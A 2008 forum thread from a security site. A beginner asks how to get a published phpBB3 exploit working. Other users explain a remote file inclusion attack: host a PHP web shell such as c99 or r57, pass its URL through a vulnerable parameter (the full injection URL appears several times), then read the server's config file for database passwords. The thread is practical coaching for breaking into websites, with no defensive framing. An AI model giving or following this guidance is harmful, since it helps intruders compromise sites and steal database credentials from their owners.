 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
SQL Injection PhpBB3 |
 |
 Posted: Wed Jun 04, 2008 1:34 pm |
 |
|
| mantan |
| Beginner |
 |
|
| Joined: Jun 04, 2008 |
| Posts: 2 |
|
|
|
 |
|
 |
|
Hi there  I recently attempted an SQL Injection using the following exploit...
http://www.milw0rm.com/exploits/5671
However, I can't get it to seem to work properly. I tried using different SQL functions, but I always get the error message "No input file specified."
The exploit does say that you need to input the link to a shell file (or something), but I'm not entirely sure what that means.
Anyone more experienced able to give me advice? |
|
|
|
|
| Posted: Thu Jun 05, 2008 1:47 am |
|
|
| gibbocool |
| Advanced user |
 |
|
| Joined: Jan 22, 2008 |
| Posts: 208 |
|
|
|
|
|
|
|
You need to link to the file you want to include.
So upload the file somewhere. or you can get WAMP and just link to your own pc, but of course this isn't very safe because admin will have your IP. |
|
|
|
|
|
|
|
|
| Posted: Thu Jun 05, 2008 3:33 pm |
|
|
| mantan |
| Beginner |
|
|
| Joined: Jun 04, 2008 |
| Posts: 2 |
|
|
|
|
|
|
|
| gibbocool wrote: | You need to link to the file you want to include.
So upload the file somewhere. or you can get WAMP and just link to your own pc, but of course this isn't very safe because admin will have your IP. |
Thanks for the answer, however I'm still a little confused
Firstly, what type of file would work? I'm assuming it'd need to be a PHP file with MySQL instructions. If I'm right, are there any examples of similar code that I could use to make the injection?
Secondly, once I've uploaded the file to a source, does that mean that I should post the hyperlink to it, after the URL, resulting in something like this...
/path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.mysite.com/test.php
Thanks for all your help  |
|
|
|
|
|
|
|
|
| Posted: Fri Jun 06, 2008 1:25 am |
|
|
| gibbocool |
| Advanced user |
|
|
| Joined: Jan 22, 2008 |
| Posts: 208 |
|
|
|
|
|
|
|
Yes you would want a php file. In this case I would get a php shell such as c99, c100, r57 etc. Using that you can find the config file of the server which will have database username and password in it. Then you can use that to connect to the database, or just use the php shell to connect to the database. if you don't have a shell, just google there are plenty.
And yes just link to it like
/path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.mysite.com/test.php |
|
|
|
|
| Posted: Fri Jun 06, 2008 9:01 am |
|
|
| mixman |
| Regular user |
|
|
| Joined: Jun 03, 2008 |
| Posts: 11 |
| Location: Estonia,Tallinn |
|
|
|
|
|
|
Dont you have to put something there?
/path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.mysite.com/test.php
Directory where file goes?  |
|
|
|
|
| Posted: Fri Jun 06, 2008 11:41 am |
|
|
| lenny |
| Valuable expert |
 |
|
| Joined: May 15, 2008 |
| Posts: 275 |
|
|
|
|
|
|
|
| It;s a horribly documented exploit! I can't make anything out of it! |
|
|
|
|
| Posted: Tue Jun 10, 2008 7:58 am |
|
|
| y3dips |
| Valuable expert |
 |
|
| Joined: Feb 25, 2005 |
| Posts: 281 |
| Location: Indonesia |
|
|
|
|
|
|
yes, true.. till u die, there will no sql statement take effect
its a RFI bug, Remote file Inclusion!
read again slowly
regards
--
y3dips |
|
_________________
IO::y3dips->new(http://clog.ammar.web.id); |
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 109
Members: 0
Total: 109
